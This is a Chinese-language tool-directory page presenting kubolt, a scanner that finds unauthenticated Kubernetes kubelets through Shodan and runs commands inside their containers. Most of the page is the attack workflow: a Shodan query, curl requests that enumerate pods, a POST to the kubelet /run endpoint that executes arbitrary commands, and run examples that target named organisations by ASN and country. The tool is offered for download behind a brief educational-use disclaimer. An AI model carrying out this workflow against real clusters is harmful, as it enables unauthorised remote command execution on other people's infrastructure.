Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
kubolt — Kubolt 扫描公共 Kubernetes 集群的实用工具 | Kitploit
工具/GitHubGitHub/averonesis/kubolt
OSINT (开源情报)侦察漏洞扫描器容器安全云安全错误配置
GitHubaveronesis/kubolt

kubolt

Kubolt 扫描公共 Kubernetes 集群的实用工具

查看仓库
1101955年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

这是什么?

Kubolt 是一款简单的工具,用于扫描公开的未认证 Kubernetes 集群,并在容器内运行命令。

为什么?

有时,kubelet 的 10250 端口会对未授权访问开放,使得可以通过 kubelet 中的 getrun 函数在容器内运行命令:

root@kitploit:~
// getRun handles requests to run a command inside a container.
func (s *Server) getRun(request *restful.Request, response *restful.Response) {
	params := getExecRequestParams(request)
	pod, ok := s.host.GetPodByName(params.podNamespace, params.podName)
	if !ok {
		response.WriteError(http.StatusNotFound, fmt.Errorf("pod does not exist"))
		return
	}

如何操作?

好吧,让我们问问我们的朋友 Shodan :trollface:

基本查询是:

ssl:true port:10250 404

Kubelet 默认使用 SSL 在 10250 端口,404 是无 URL 路径时的 HTTP 响应。

Kubolt 通过 API 向 Shodan 请求 IP 地址列表,并将其保留用于其他 OSINT 操作 😁

首先,向 Kubelet 查询正在运行的 pod,过滤掉响应中包含 Unauthorized 且不包含 container 的主机,这样我们才能在其容器内执行命令。

root@kitploit:~
curl -k https://IP-from-Shodan:10250/runningpods/ 

无论如何,如果你发现主机当前没有任何运行的 pod,请保留它,等 pod 可能启动后再试 😁

你可以通过以下请求列出所有可用的 pod:

root@kitploit:~
curl -k https://IP-from-Shodan:10250/pods/
#或
curl http://IP-from-Shodan:10255/pods/ 

接下来,kubolt 解析响应并生成如下新请求:

root@kitploit:~
curl -XPOST -k https://IP-from-Shodan:10250/run/<namespace>/<PodName>/<containerName> -d "cmd=<command-to-run>" 

你可以使用 Shodan 过滤器更精确地定位公司,例如:

  • asn
  • org
  • country
  • net

安装

root@kitploit:~
mkdir output
pip install -r requirements.txt 

运行

root@kitploit:~
python kubolt.py --query "asn:123123 org:'ACME Corporation'"
#或
python kubolt.py --query "org:'ACME Corporation' country:UK"

关于 Shodan

Kubolt 会使用 Shodan API 和相应的查询积分,如果你运行工具时不加查询过滤器,你很可能会耗尽所有积分 ¯\_(ツ)_/¯

演示

demo

重要说明

本工具由作者提供,仅供教育用途使用。作者不对工具的滥用承担责任。作者不对因使用本工具造成的任何直接或间接损害负责。

下载工具